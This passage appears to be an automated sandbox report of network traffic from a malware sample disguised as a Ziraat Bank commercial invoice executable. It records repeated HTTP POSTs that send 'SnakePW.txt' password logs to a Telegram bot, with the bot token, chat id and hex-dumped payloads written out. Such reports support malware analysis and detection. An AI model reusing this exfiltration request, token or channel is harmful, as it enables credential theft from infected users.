                                      Date: Thu, 26 Sep 2024 08:59:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:37 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 37 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35827,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341177,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.449760149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:38 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf3281761e6b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:38 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 33 32 38 31 37 36 31 65 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf3281761e6bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:38 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 37 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35828,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341178,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.449761149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:38 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf3d2bfbc497
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:38 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 33 64 32 62 66 62 63 34 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf3d2bfbc497Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:39 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:39 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:39 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 37 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35829,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341179,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.449762149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:39 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf4926a47bfb
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:39 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 34 39 32 36 61 34 37 62 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf4926a47bfbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:43 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:43 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:43 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 38 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35830,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341183,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.449763149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:43 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf7789291eee
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:43 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 37 37 38 39 32 39 31 65 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf7789291eeeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:44 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:44 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:44 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 38 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35831,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341184,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.449764149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:44 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf8369e95089
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:44 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 38 33 36 39 65 39 35 30 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf8369e95089Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:45 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:45 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 38 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35832,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341185,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.449765149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:45 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf8f4477bfee
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:45 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 38 66 34 34 37 37 62 66 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf8f4477bfeeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:46 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:46 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:46 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 38 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35833,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341186,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.449766149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:46 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdf99c979f909
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:46 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 39 39 63 39 37 39 66 39 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdf99c979f909Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:47 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 516
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
